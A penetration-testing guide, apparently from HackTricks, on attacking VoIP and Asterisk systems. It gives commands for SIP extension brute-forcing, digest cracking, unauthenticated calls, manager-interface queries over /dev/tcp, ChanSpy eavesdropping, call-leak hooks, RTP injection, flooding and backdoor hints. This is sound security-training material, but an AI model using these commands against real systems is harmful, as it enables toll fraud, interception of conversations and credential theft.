overview.md (33973B)
1 --- 2 title: "Pentesting VoIP" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/pentesting-voip/README.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-voip/README.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: true 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Pentesting VoIP 14 15 ## VoIP Basic Information 16 17 To start learning about how VoIP works check: 18 19 20 [Basic Voip Protocols](/hacktricks/network-services-pentesting/pentesting-voip/basic-voip-protocols/overview) 21 22 ## Basic messages<sup>[[7]](#references)</sup> 23 24 ```text 25 Request name Description RFC references 26 ------------------------------------------------------------------------------------------------------ 27 REGISTER Register a SIP user. RFC 3261 28 INVITE Initiate a dialog for establishing a call. RFC 3261 29 ACK Confirm that an entity has received. RFC 3261 30 BYE Signal termination of a dialog and end a call. RFC 3261 31 CANCEL Cancel any pending request. RFC 3261 32 UPDATE Modify the state of a session without changing the state of the dialog. RFC 3311 33 REFER Ask recipient to issue a request for the purpose of call transfer. RFC 3515 34 PRACK Provisional acknowledgement. RFC 3262 35 SUBSCRIBE Initiates a subscription for notification of events from a notifier. RFC 6665 36 NOTIFY Inform a subscriber of notifications of a new event. RFC 6665 37 PUBLISH Publish an event to a notification server. RFC 3903 38 MESSAGE Deliver a text message. Used in instant messaging applications. RFC 3428 39 INFO Send mid-session information that does not modify the session state. RFC 6086 40 OPTIONS Query the capabilities of an endpoint RFC 3261 41 ``` 42 43 ## Response codes<sup>[[7]](#references)</sup> 44 45 **1xx—Provisional Responses** 46 47 ```text 48 100 Trying 49 180 Ringing 50 181 Call is Being Forwarded 51 182 Queued 52 183 Session Progress 53 199 Early Dialog Terminated 54 ``` 55 56 **2xx—Successful Responses** 57 58 ```text 59 200 OK 60 202 Accepted 61 204 No Notification 62 ``` 63 64 **3xx—Redirection Responses** 65 66 ```text 67 300 Multiple Choices 68 301 Moved Permanently 69 302 Moved Temporarily 70 305 Use Proxy 71 380 Alternative Service 72 ``` 73 74 **4xx—Client Failure Responses** 75 76 ```text 77 400 Bad Request 78 401 Unauthorized 79 402 Payment Required 80 403 Forbidden 81 404 Not Found 82 405 Method Not Allowed 83 406 Not Acceptable 84 407 Proxy Authentication Required 85 408 Request Timeout 86 409 Conflict 87 410 Gone 88 411 Length Required 89 412 Conditional Request Failed 90 413 Request Entity Too Large 91 414 Request-URI Too Long 92 415 Unsupported Media Type 93 416 Unsupported URI Scheme 94 417 Unknown Resource-Priority 95 420 Bad Extension 96 421 Extension Required 97 422 Session Interval Too Small 98 423 Interval Too Brief 99 424 Bad Location Information 100 425 Bad Alert Message 101 428 Use Identity Header 102 429 Provide Referrer Identity 103 430 Flow Failed 104 433 Anonymity Disallowed 105 436 Bad Identity-Info 106 437 Unsupported Certificate 107 438 Invalid Identity Header 108 439 First Hop Lacks Outbound Support 109 440 Max-Breadth Exceeded 110 469 Bad Info Package 111 470 Consent Needed 112 480 Temporarily Unavailable 113 481 Call/Transaction Does Not Exist 114 482 Loop Detected 115 483 Too Many Hops 116 484 Address Incomplete 117 485 Ambiguous 118 486 Busy Here 119 487 Request Terminated 120 488 Not Acceptable Here 121 489 Bad Event 122 491 Request Pending 123 493 Undecipherable 124 494 Security Agreement Required 125 ``` 126 127 **5xx—Server Failure Responses** 128 129 ```text 130 500 Internal Server Error 131 501 Not Implemented 132 502 Bad Gateway 133 503 Service Unavailable 134 504 Server Time-out 135 505 Version Not Supported 136 513 Message Too Large 137 555 Push Notification Service Not Supported 138 580 Precondition Failure 139 ``` 140 141 **6xx—Global Failure Responses** 142 143 ```text 144 600 Busy Everywhere 145 603 Decline 146 604 Does Not Exist Anywhere 147 606 Not Acceptable 148 607 Unwanted 149 608 Rejected 150 ``` 151 152 ## VoIP Enumeration 153 154 ### Telephone Numbers 155 156 One of a red team's first steps can be to identify company telephone numbers with OSINT tools, Google searches, or web scraping. 157 158 Once you have the telephone numbers you could use online services to identify the operator: 159 160 - [https://www.numberingplans.com/?page=analysis\&sub=phonenr](https://www.numberingplans.com/?page=analysis&sub=phonenr) 161 - [https://mobilenumbertracker.com/](https://mobilenumbertracker.com/) 162 - [https://www.whitepages.com/](https://www.whitepages.com/) 163 - [https://www.twilio.com/lookup](https://www.twilio.com/lookup) 164 165 Knowing whether the operator provides VoIP services can help determine whether the company uses VoIP. A company may also connect its own VoIP PBX to the traditional telephony network with PSTN cards instead of buying a managed VoIP service. 166 167 Automated responses or music on hold can also indicate that VoIP is in use. 168 169 ### Google Dorks 170 171 ```bash 172 # Grandstream phones 173 intitle:"Grandstream Device Configuration" Password 174 intitle:"Grandstream Device Configuration" (intext:password & intext:"Grandstream Device Configuration" & intext:"Grandstream Networks" | inurl:cgi-bin) -.com|org 175 176 # Cisco Callmanager 177 inurl:"ccmuser/logon.asp" 178 intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button" 179 180 # Cisco phones 181 inurl:"NetworkConfiguration" cisco 182 183 # Linksys phones 184 intitle:"Sipura SPA Configuration" 185 186 # Snom phones 187 intitle:"snom" intext:"Welcome to Your Phone!" inurl:line_login.htm 188 189 # Polycom SoundPoint IP & phones 190 intitle:"SoundPoint IP Configuration Utility - Registration" 191 "Welcome to Polycom Web Configuration Utility" "Login as" "Password" 192 intext: "Welcome to Polycom Web Configuration Utility" intitle:"Polycom - Configuration Utility" inurl:"coreConf.htm" 193 intitle:"Polycom Login" inurl:"/login.html" 194 intitle:"Polycom Login" -.com 195 196 # Elastix 197 intitle:"Elastix - Login page" intext:"Elastix is licensed under GPL" 198 199 # FreePBX 200 inurl:"maint/index.php?FreePBX" intitle: "FreePBX" intext:"FreePBX Admministration" 201 ``` 202 203 ### OSINT information 204 205 Any other OSINT enumeration that helps to identify VoIP software being used will be helpful for a Red Team. 206 207 ### Network Enumeration 208 209 - **Nmap** can scan UDP services, but broad UDP scans are slow and may be less accurate than targeted probes. 210 211 ```bash 212 sudo nmap --script=sip-methods -sU -p 5060 10.10.0.0/24 213 ``` 214 215 - **`svmap`** from SIPVicious (`sudo apt install sipvicious`): Will locate SIP services in the indicated network.<sup>[[2]](#references)</sup> 216 - `svmap` is **easy to block** because it uses the User-Agent `friendly-scanner`, but you could modify the code from `/usr/share/sipvicious/sipvicious` and change it. 217 218 ```bash 219 # Use --fp to fingerprint the services 220 svmap 10.10.0.0/24 -p 5060-5070 [--fp] 221 ``` 222 223 - **`SIPPTS scan`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS scan is a fast scanner for SIP services over UDP, TCP, or TLS. It uses multithreading and can scan large network ranges. You can specify a port range, scan TCP and UDP, select a method (the default is `OPTIONS`), and customize the User-Agent.<sup>[[1]](#references)</sup> 224 225 ```bash 226 sippts scan -i 10.10.0.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER] 227 228 [!] IP/Network: 10.10.0.0/24 229 [!] Port range: 5060-5080 230 [!] Protocol: UDP, TCP, TLS 231 [!] Method to scan: REGISTER 232 [!] Customized User-Agent: Cisco 233 [!] Used threads: 200 234 ``` 235 236 - **metasploit**: 237 238 ```text 239 auxiliary/scanner/sip/options_tcp normal No SIP Endpoint Scanner (TCP) 240 auxiliary/scanner/sip/options normal No SIP Endpoint Scanner (UDP) 241 ``` 242 243 #### Extra Network Enumeration 244 245 The PBX could also be exposing other network services such as: 246 247 - **69/UDP (TFTP)**: Firmware updates 248 - **80 (HTTP) / 443 (HTTPS)**: To manage the device from the web 249 - **389 (LDAP)**: Alternative to store the users information 250 - **3306 (MySQL**): MySQL database 251 - **5038 (Manager)**: Allows to use Asterisk from other platforms 252 - **5222 (XMPP)**: Messages using Jabber 253 - **5432 (PostgreSQL)**: PostgreSQL database 254 - And others... 255 256 ### Methods Enumeration 257 258 It's possible to find **which methods are available** to use in the PBX using `SIPPTS enumerate` from [**sippts**](https://github.com/Pepelux/sippts)<sup>[[1]](#references)</sup> 259 260 ```bash 261 sippts enumerate -i 10.10.0.10 262 ``` 263 264 ### Analysing server responses 265 266 It is very important to analyse the headers that a server sends back to us, depending on the type of message and headers that we send. With `SIPPTS send` from [**sippts**](https://github.com/Pepelux/sippts) we can send personalised messages, manipulating all the headers, and analyse the response.<sup>[[1]](#references)</sup> 267 268 ```bash 269 sippts send -i 10.10.0.10 -m INVITE -ua Grandstream -fu 200 -fn Bob -fd 11.0.0.1 -tu 201 -fn Alice -td 11.0.0.2 -header "Allow-Events: presence" -sdp 270 ``` 271 272 It is also possible to obtain data when the server uses WebSockets. `SIPPTS wssend` from [**sippts**](https://github.com/Pepelux/sippts) can send customized WebSocket messages. 273 274 ```bash 275 sippts wssend -i 10.10.0.10 -r 443 -path /ws 276 ``` 277 278 ### Extension Enumeration 279 280 Extensions in a PBX (Private Branch Exchange) system refer to the **unique internal identifiers assigned to individual** phone lines, devices, or users within an organization or business. Extensions make it possible to **route calls within the organization efficiently**, without the need for individual external phone numbers for each user or device. 281 282 - **`svwar`** from SIPVicious (`sudo apt install sipvicious`): `svwar` is a free SIP PBX extension line scanner. In concept it works similar to traditional wardialers by **guessing a range of extensions or a given list of extensions**.<sup>[[2]](#references)</sup> 283 284 ```bash 285 svwar 10.10.0.10 -p5060 -e100-300 -m REGISTER 286 ``` 287 288 - **`SIPPTS exten`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS exten identifies extensions on a SIP server. Sipexten can check large network and port ranges.<sup>[[1]](#references)</sup> 289 290 ```bash 291 sippts exten -i 10.10.0.10 -r 5060 -e 100-200 292 ``` 293 294 - **metasploit**: You can also enumerate extensions/usernames with metasploit: 295 296 ```text 297 auxiliary/scanner/sip/enumerator_tcp normal No SIP Username Enumerator (TCP) 298 auxiliary/scanner/sip/enumerator normal No SIP Username Enumerator (UDP) 299 ``` 300 301 - **`enumiax` (`apt install enumiax`): enumIAX** is an Inter Asterisk Exchange protocol **username brute-force enumerator**. enumIAX may operate in two distinct modes; Sequential Username Guessing or Dictionary Attack. 302 303 ```bash 304 enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 10.10.0.10 # Use dictionary 305 enumiax -v -m3 -M3 10.10.0.10 306 ``` 307 308 ## VoIP Attacks 309 310 ### Password Brute-Force - online 311 312 Having discovered the **PBX** and some **extensions/usernames**, a Red Team could try to **authenticate via the `REGISTER` method** to an extension using a dictionary of common passwords to brute force the authentication. 313 314 > [!CAUTION] 315 > Note that a **username** can be the same as the extension, but this practice may vary depending on the PBX system, its configuration, and the organization's preferences... 316 > 317 > If the username is not the same as the extension, you will need to **figure out the username to brute-force it**. 318 319 - **`svcrack`** from SIPVicious (`sudo apt install sipvicious`): SVCrack allows you to crack the password for a specific username/extension on a PBX.<sup>[[2]](#references)</sup> 320 321 ```bash 322 svcrack -u100 -d dictionary.txt udp://10.0.0.1:5080 #Crack known username 323 svcrack -u100 -r1-9999 -z4 10.0.0.1 #Check username in extensions 324 ``` 325 326 - **`SIPPTS rcrack`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rcrack is a remote password cracker for SIP services. Rcrack can test passwords for several users in different IPs and port ranges.<sup>[[1]](#references)</sup> 327 328 ```bash 329 sippts rcrack -i 10.10.0.10 -e 100,101,103-105 -w wordlist/rockyou.txt 330 ``` 331 332 - **Metasploit**: 333 - [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb) 334 - [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack_tcp.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack_tcp.rb) 335 336 ### VoIP Sniffing 337 338 If you find VoIP equipment on an **open Wi-Fi network**, you may be able to **sniff its traffic**. On a more restricted network (connected via Ethernet or protected Wi-Fi), you could perform **man-in-the-middle attacks such as** [**ARP spoofing**](../../generic-methodologies-and-resources/pentesting-network/index.html#arp-spoofing) between the **PBX and the gateway** to inspect the traffic. 339 340 Among the network information, you could find **web credentials** to manage the equipment, user **extensions**, **username**, **IP** addresses, even **hashed passwords** and **RTP packets** that you could reproduce to **hear the conversation**, and more. 341 342 To get this information you could use tools such as Wireshark, tcpdump... but a **specially created tool to sniff VoIP conversations is** [**ucsniff**](https://github.com/Seabreg/ucsniff). 343 344 > [!CAUTION] 345 > Note that if **TLS is used in the SIP communication** you won't be able to see the SIP communication in clear.\ 346 > The same will happen if **SRTP** and **ZRTP** is used, **RTP packets won't be in clear text**. 347 348 #### SIP credentials (Password Brute-Force - offline) 349 350 [Review this **SIP REGISTER example**](/hacktricks/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol#sip-register-example) to understand how credentials are transmitted. 351 352 - **`sipdump`** and **`sipcrack`**, part of **sipcrack** (`apt-get install sipcrack`): These tools can extract SIP digest authentication exchanges from a **PCAP** and brute-force them offline.<sup>[[6]](#references)</sup> 353 354 ```bash 355 sipdump -p net-capture.pcap sip-creds.txt 356 sipcrack sip-creds.txt -w dict.txt 357 ``` 358 359 - **`SIPPTS dump`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS dump can extract digest authentications from a pcap file.<sup>[[1]](#references)</sup> 360 361 ```bash 362 sippts dump -f capture.pcap -o data.txt 363 ``` 364 365 - **`SIPPTS dcrack`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS dcrack is a tool to crack the digest authentications obtained with SIPPTS dump. 366 367 ```bash 368 sippts dcrack -f data.txt -w wordlist/rockyou.txt 369 ``` 370 371 - **`SIPPTS tshark`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS tshark extracts data of SIP protocol from a PCAP file. 372 373 ```bash 374 sippts tshark -f capture.pcap [-filter auth] 375 ``` 376 377 #### DTMF codes 378 379 Network traffic may reveal not only SIP credentials but also DTMF codes used to access services such as **voicemail**.\ 380 These codes can be sent in SIP `INFO` messages, as audio, or inside RTP packets. If the codes are in RTP packets, extract that part of the conversation and use `multimon` to decode them: 381 382 ```bash 383 multimon -a DTMF -t wac pin.wav 384 ``` 385 386 ### Free calls / legacy Asterisk connection misconfigurations<sup>[[8]](#references)</sup> 387 388 The `sip.conf`, `type`, and `insecure` examples below apply to the legacy `chan_sip` driver. Asterisk deprecated `chan_sip` in version 17 and removed it in version 21; assess modern deployments through their `pjsip.conf` endpoint, authentication, address-of-record, and identification objects instead.<sup>[[8]](#references)</sup> 389 390 In legacy Asterisk configurations, it is possible to allow a connection **from a specific IP address** or from **any IP address**: 391 392 ```text 393 host=10.10.10.10 394 host=dynamic 395 ``` 396 397 If an IP address is specified, the host **does not need to send periodic REGISTER** requests. Dynamic peers instead refresh their registration before the expiry conveyed by the `Expires` header or the Contact `expires` parameter, commonly every 30 minutes. A statically addressed host must still allow the VoIP server to reach its SIP and media ports for incoming calls. 398 399 Legacy `chan_sip` peers can use the following `type` values: 400 401 - **`type=user`**: The user can only receive calls as user. 402 - **`type=friend`**: It's possible to perform calls as peer and receive them as user (used with extensions) 403 - **`type=peer`**: It's possible to send and receive calls as peer (SIP-trunks) 404 405 It's also possible to establish trust with the insecure variable: 406 407 - **`insecure=port`**: Allows peer connections validated by IP. 408 - **`insecure=invite`**: Doesn't require authentication for INVITE messages 409 - **`insecure=port,invite`**: Both 410 411 > [!WARNING] 412 > When **`type=friend`** is used, the **value** of the **host** variable **won't be used**, so if an admin **misconfigure a SIP-trunk** using that value, **anyone will be able to connect to it**. 413 > 414 > For example, this configuration would be vulnerable:\ 415 > `host=10.10.10.10`\ 416 > `insecure=port,invite`\ 417 > `type=friend` 418 419 ### Free calls / Asterisk context misconfigurations 420 421 In Asterisk a **context** is a named container or section in the dial plan that **groups together related extensions, actions, and rules**. The dial plan is the core component of an Asterisk system, as it defines **how incoming and outgoing calls are handled and routed**. Contexts are used to organize the dial plan, manage access control, and provide separation between different parts of the system. 422 423 Each context is defined in the configuration file, typically in the **`extensions.conf`** file. Contexts are denoted by square brackets, with the context name enclosed within them. For example: 424 425 ```bash 426 csharpCopy code[my_context] 427 ``` 428 429 Inside the context, you define extensions (patterns of dialed numbers) and associate them with a series of actions or applications. These actions determine how the call is processed. For instance: 430 431 ```text 432 [my_context] 433 exten => 100,1,Answer() 434 exten => 100,n,Playback(welcome) 435 exten => 100,n,Hangup() 436 ``` 437 438 This example demonstrates a simple context called "my_context" with an extension "100". When someone dials 100, the call will be answered, a welcome message will be played, and then the call will be terminated. 439 440 This is **another context** that allows calls to **any other number**: 441 442 ```text 443 [external] 444 exten => _X.,1,Dial(SIP/trunk/${EXTEN}) 445 ``` 446 447 If the admin defines the **default context** as: 448 449 ```text 450 [default] 451 include => my_context 452 include => external 453 ``` 454 455 > [!WARNING] 456 > Anyone will be able to use the **server to call any other number** (and the server administrator will pay for the call). 457 458 > [!CAUTION] 459 > Moreover, by default the **`sip.conf`** file contains **`allowguest=true`**, then **any** attacker with **no authentication** will be able to call to any other number. 460 461 - **`SIPPTS invite`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS invite checks if a **PBX server allows us to make calls without authentication**. If the SIP server has an incorrect configuration, it will allow us to make calls to external numbers. It can also allow us to transfer the call to a second external number.<sup>[[1]](#references)</sup> 462 463 For example, if your Asterisk server has a bad context configuration, you can accept INVITE request without authorization. In this case, an attacker can make calls without knowing any user/pass. 464 465 ```bash 466 # Trying to make a call to the number 555555555 (without auth) with source number 200. 467 sippts invite -i 10.10.0.10 -fu 200 -tu 555555555 -v 468 469 # Trying to make a call to the number 555555555 (without auth) and transfer it to number 444444444. 470 sippts invite -i 10.10.0.10 -tu 555555555 -t 444444444 471 ``` 472 473 ### Free calls / Misconfigured IVRS 474 475 IVRS stands for **Interactive Voice Response System**, a telephony technology that allows users to interact with a computerized system through voice or touch-tone inputs. IVRS is used to build **automated call handling** systems that offer a range of functionalities, such as providing information, routing calls, and capturing user input. 476 477 IVRS in VoIP systems typically consists of: 478 479 1. **Voice prompts**: Pre-recorded audio messages that guide users through the IVR menu options and instructions. 480 2. **DTMF** (Dual-Tone Multi-Frequency) signaling: Touch-tone inputs generated by pressing keys on the phone, which are used to navigate through the IVR menus and provide input. 481 3. **Call routing**: Directing calls to the appropriate destination, such as specific departments, agents, or extensions based on user input. 482 4. **User input capture**: Collecting information from callers, such as account numbers, case IDs, or any other relevant data. 483 5. **Integration with external systems**: Connecting the IVR system to databases or other software systems to access or update information, perform actions, or trigger events. 484 485 In an Asterisk VoIP system, you can create an IVR using the dial plan (**`extensions.conf`** file) and various applications such as `Background()`, `Playback()`, `Read()`, and more. These applications help you play voice prompts, capture user input, and control the call flow. 486 487 #### Example of vulnerable configuration 488 489 ```text 490 exten => 0,100,Read(numbers,the_call,,,,5) 491 exten => 0,101,GotoIf("$[${numbers}"="1"]?200) 492 exten => 0,102,GotoIf("$[${numbers}"="2"]?300) 493 exten => 0,103,GotoIf("$[${numbers}"=""]?100) 494 exten => 0,104,Dial(LOCAL/${numbers}) 495 ``` 496 497 The preceding example asks the user to **press 1 to call** one department, **2 to call** another, or enter a **complete extension**.\ 498 The vulnerability is that the **extension length is not checked**, so a user can enter a complete telephone number during the five-second timeout and cause Asterisk to call it. 499 500 ### Extension Injection 501 502 Using a extension such as: 503 504 ```text 505 exten => _X.,1,Dial(SIP/${EXTEN}) 506 ``` 507 508 Where **`${EXTEN}`** is the **extension** that will be called, when the **ext 101 is introduced** this is what would happen: 509 510 ```text 511 exten => 101,1,Dial(SIP/101) 512 ``` 513 514 However, if **`${EXTEN}`** accepts **characters other than digits** (as in older Asterisk versions), an attacker could supply **`101&SIP123123123`** to call the telephone number 123123123. This would produce the following result: 515 516 ```text 517 exten => 101&SIP123123123,1,Dial(SIP/101&SIP123123123) 518 ``` 519 520 Therefore, calls to extensions **`101`** and **`123123123`** will be sent, and only the first answered call will be established. If an attacker supplies a nonexistent extension that bypasses the applied matching, the attacker may be able to inject a call only to the desired number. 521 522 ## SIPDigestLeak vulnerability 523 524 The SIP Digest Leak is a vulnerability that affects a large number of SIP Phones, including both hardware and software IP Phones as well as phone adapters (VoIP to analogue). The vulnerability allows **leakage of the Digest authentication response**, which is computed from the password. An **offline password attack is then possible** and can recover most passwords based on the challenge response.<sup>[[5]](#references)</sup> 525 526 **[Vulnerability scenario from here**](https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf):<sup>[[5]](#references)</sup> 527 528 1. An IP Phone (victim) is listening on any port (for example: 5060), accepting phone calls 529 2. The attacker sends an INVITE to the IP Phone 530 3. The victim phone starts ringing and someone picks up and hangs up (because no one answers the phone at the other end) 531 4. When the phone is hung up, the **victim phone sends a BYE to the attacker** 532 5. The **attacker issues a 407 response** that **asks for authentication** and issues an authentication challenge 533 6. The **victim phone provides a response to the authentication challenge** in a second BYE 534 7. The **attacker can then issue a brute-force attack** on the challenge response on his local machine (or distributed network etc) and guess the password 535 536 - **SIPPTS leak** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS leak exploits the SIP Digest Leak vulnerability that affects many SIP phones. Its output can be saved in SipCrack format and brute-forced with SIPPTS dcrack or SipCrack.<sup>[[1]](#references)</sup> 537 538 ```bash 539 sippts leak -i 10.10.0.10 540 541 [!] Target: 10.10.0.10:5060/UDP 542 [!] Caller: 100 543 [!] Callee: 100 544 545 [=>] Request INVITE 546 [<=] Response 100 Trying 547 [<=] Response 180 Ringing 548 [<=] Response 200 OK 549 [=>] Request ACK 550 ... waiting for BYE ... 551 [<=] Received BYE 552 [=>] Request 407 Proxy Authentication Required 553 [<=] Received BYE with digest 554 [=>] Request 200 Ok 555 556 Auth=Digest username="pepelux", realm="asterisk", nonce="lcwnqoz0", uri="sip:100@10.10.0.10:56583;transport=UDP", response="31fece0d4ff6fd524c1d4c9482e99bb2", algorithm=MD5 557 ``` 558 559 ### Click2Call 560 561 Click2Call allows a **web user** (who for example might be interested in a product) to **introduce** his **telephone number** to get called. Then a commercial will be called, and when he **picks up the phone** the user will be **called and connected with the agent**. 562 563 A common Asterisk profile for this is: 564 565 ```text 566 [web_user] 567 secret = complex_password 568 deny = 0.0.0.0/0.0.0.0 569 allow = 0.0.0.0/0.0.0.0 570 displayconnects = yes 571 read = system,call,log,verbose,agent,user,config,dtmf,reporting,crd,diapla 572 write = system,call,agent,user,config,command,reporting,originate 573 ``` 574 575 - The previous profile is allowing **ANY IP address to connect** (if the password is known). 576 - To **organize a call**, like specified previously, **no read permissions is necessary** and **only** **originate** in **write** is needed. 577 578 With those permissions any IP knowing the password could connect and extract too much info, like: 579 580 ```bash 581 # Get all the peers 582 exec 3<>/dev/tcp/10.10.10.10/5038 && echo -e "Action: Login\nUsername:test\nSecret:password\nEvents: off\n\nAction:Command\nCommand: sip show peers\n\nAction: logoff\n\n">&3 && cat <&3 583 ``` 584 585 **More information or actions could be requested.** 586 587 ### **Eavesdropping** 588 589 In Asterisk, **`ChanSpy`** can monitor selected extensions (or all of them) and listen to active conversations. This command must be assigned to an extension. 590 591 For example, **`exten => 333,1,ChanSpy('all',qb)`** indicate that if you **call** the **extension 333**, it will **monitor** **`all`** the extensions, **start listening** whenever a new conversation start (**`b`**) in quiet mode (**`q`**) as we don't want to interact on it. You could go from one conversation happening to another pressing **`*`**, or marking the extension number. 592 593 It is also possible to use **`ExtenSpy`** to monitor only one extension. 594 595 Instead of listening the conversations, it's possible to **record them in files** using an extension such as: 596 597 ```text 598 [recorded-context] 599 exten => _X.,1,Set(NAME=/tmp/${CONTEXT}_${EXTEN}_${CALLERID(num)}_${UNIQUEID}.wav) 600 exten => _X.,2,MixMonitor(${NAME}) 601 ``` 602 603 Calls will be saved in **`/tmp`**. 604 605 You could also even make Asterisk **execute a script that will leak the call** when it's closed. 606 607 ```text 608 exten => h,1,System(/tmp/leak_conv.sh &) 609 ``` 610 611 ### RTP/RTCP Bleed vulnerabilities 612 613 **RTCPBleed** is a major security issue affecting Asterisk-based VoIP servers (published in 2017). The vulnerability allows **RTP (Real Time Protocol) traffic**, which carries VoIP conversations, to be **intercepted and redirected by anyone on the Internet**. This occurs because RTP traffic bypasses authentication when navigating through NAT (Network Address Translation) firewalls.<sup>[[4]](#references)</sup> 614 615 RTP proxies address **NAT limitations** in real-time communication systems by proxying RTP streams between parties. With NAT, a proxy often cannot rely on the RTP address and port advertised through signaling such as SIP. Some proxies therefore learn the **IP-and-port tuple automatically** by inspecting incoming RTP traffic and using its source as the response destination. If this "learning mode" does not authenticate the source, an **attacker can send RTP traffic to the proxy** and receive media intended for a legitimate caller or callee. This is called RTP Bleed.<sup>[[4]](#references)</sup> 616 617 Another interesting behaviour of RTP proxies and RTP stacks is that sometimes, **even if not vulnerable to RTP Bleed**, they will **accept, forward and/or process RTP packets from any source**. Therefore attackers can send RTP packets which may allow them to inject their media instead of the legitimate one. We call this attack RTP injection because it allows injection of illegitimate RTP packets into existent RTP streams. This vulnerability may be found in both RTP proxies and endpoints.<sup>[[4]](#references)</sup> 618 619 Asterisk and FreePBX have traditionally used the **`NAT=yes` setting**, which enables RTP traffic to bypass authentication, potentially leading to no audio or one-way audio on calls. 620 621 For more info check [https://www.rtpbleed.com/](https://www.rtpbleed.com/)<sup>[[4]](#references)</sup> 622 623 - **`SIPPTS rtpbleed`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rtpbleed detects the RTP Bleed vulnerability sending RTP streams.<sup>[[1]](#references)</sup> 624 625 ```bash 626 sippts rtpbleed -i 10.10.0.10 627 ``` 628 629 - **`SIPPTS rtcpbleed`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rtcpbleed detects the RTP Bleed vulnerability sending RTCP streams. 630 631 ```bash 632 sippts rtcpbleed -i 10.10.0.10 633 ``` 634 635 - **`SIPPTS rtpbleedflood`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rtpbleedflood exploit the RTP Bleed vulnerability sending RTP streams. 636 637 ```bash 638 sippts rtpbleedflood -i 10.10.0.10 -p 10070 -v 639 ``` 640 641 - **`SIPPTS rtpbleedinject`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rtpbleedinject exploit the RTP Bleed vulnerability injecting an audio file (WAV format). 642 643 ```bash 644 sippts rtpbleedinject -i 10.10.0.10 -p 10070 -f audio.wav 645 ``` 646 647 ### RCE 648 649 If you can **add extension rules and reload them** in Asterisk (for example, after compromising a vulnerable web-management server), the **`System`** command can provide remote code execution. 650 651 ```text 652 same => n,System(echo "Called at $(date)" >> /tmp/call_log.txt) 653 ``` 654 655 There is command called **`Shell`** that could be used **instead of `System`** to execute system commands if necessary. 656 657 > [!WARNING] 658 > If the server is **disallowing the use of certain characters** in the **`System`** command (like in Elastix), check if the web server allows to **create files somehow inside the system** (like in Elastix or trixbox), and use it to **create a backdoor script** and then use **`System`** to **execute** that **script**. 659 660 #### Interesting local files and permissions 661 662 - **`sip.conf`** -> Contains the password of SIP users. 663 - If the **Asterisk server is running as root**, you could compromise root 664 - The **MySQL `root` user** might **have no password**. 665 - this could be used to create a new mysql user as backdoor 666 - **FreePBX** 667 - **`amportal.conf`** -> Contains the password of the web panel administrator (FreePBX) 668 - **`FreePBX.conf`** -> Contains the password of the `FreePBXuser` account used to access the database 669 - this could be used to create a new mysql user as backdoor 670 - **`Elastix`** 671 - **`Elastix.conf`** -> Contains several cleartext passwords, such as the MySQL `root`, IMAP daemon, and web administrator passwords 672 - **Several folders** will belong to the compromised asterisk user (if not running as root). This user can read the previous files and also controls the configuration, so he could make Asterisk to load other backdoored binaries when executed. 673 674 ### RTP Injection 675 676 It is possible to insert a **`.wav`** file into conversations with tools such as **`rtpinsertsound`** (`sudo apt install rtpinsertsound`) and **`rtpmixsound`** (`sudo apt install rtpmixsound`). 677 678 Or you could use the scripts from [http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/](http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/) to **scan conversations** (**`rtpscan.pl`**), send a `.wav` to a conversation (**`rtpsend.pl`**) and **insert noise** in a conversation (**`rtpflood.pl`**).<sup>[[3]](#references)</sup> 679 680 ### DoS 681 682 There are several ways to try to achieve DoS in VoIP servers. 683 684 - **`SIPPTS flood`** from [**sippts**](https://github.com/Pepelux/sippts)**: SIPPTS flood sends unlimited messages to the target.<sup>[[1]](#references)</sup> 685 - `sippts flood -i 10.10.0.10 -m invite -v` 686 - **`SIPPTS ping`** from [**sippts**](https://github.com/Pepelux/sippts)**: SIPPTS ping makes a SIP ping to see the server response time. 687 - `sippts ping -i 10.10.0.10` 688 - [**IAXFlooder**](https://www.kali.org/tools/iaxflood/): DoS IAX protocol used by Asterisk 689 - [**inviteflood**](https://github.com/foreni-packages/inviteflood/blob/master/inviteflood/Readme.txt): A tool to perform SIP/SDP INVITE message flooding over UDP/IP. 690 - [**rtpflood**](https://www.kali.org/tools/rtpflood/): Send several well-formed RTP packets. You need to identify the RTP ports in use first. 691 - [**SIPp**](https://github.com/SIPp/sipp): Allows to analyze and generate SIP traffic. so it can be used to DoS also. 692 - [**SIPsak**](https://github.com/nils-ohlmeier/sipsak): SIP swiss army knife. Can also be used to perform SIP attacks. 693 - Fuzzers: [**protos-sip**](https://www.kali.org/tools/protos-sip/), [**voiper**](https://github.com/gremwell/voiper). 694 695 ### OS Vulnerabilities 696 697 The easiest way to install a software such as Asterisk is to download an **OS distribution** that has it already installed, such as: **FreePBX, Elastix, Trixbox**... The problem with those is that once it's working sysadmins might **not update them again** and **vulnerabilities** are going to be discovered with time. 698 699 ## References 700 701 - [1] [sippts wiki](https://github.com/Pepelux/sippts/wiki) 702 - [2] 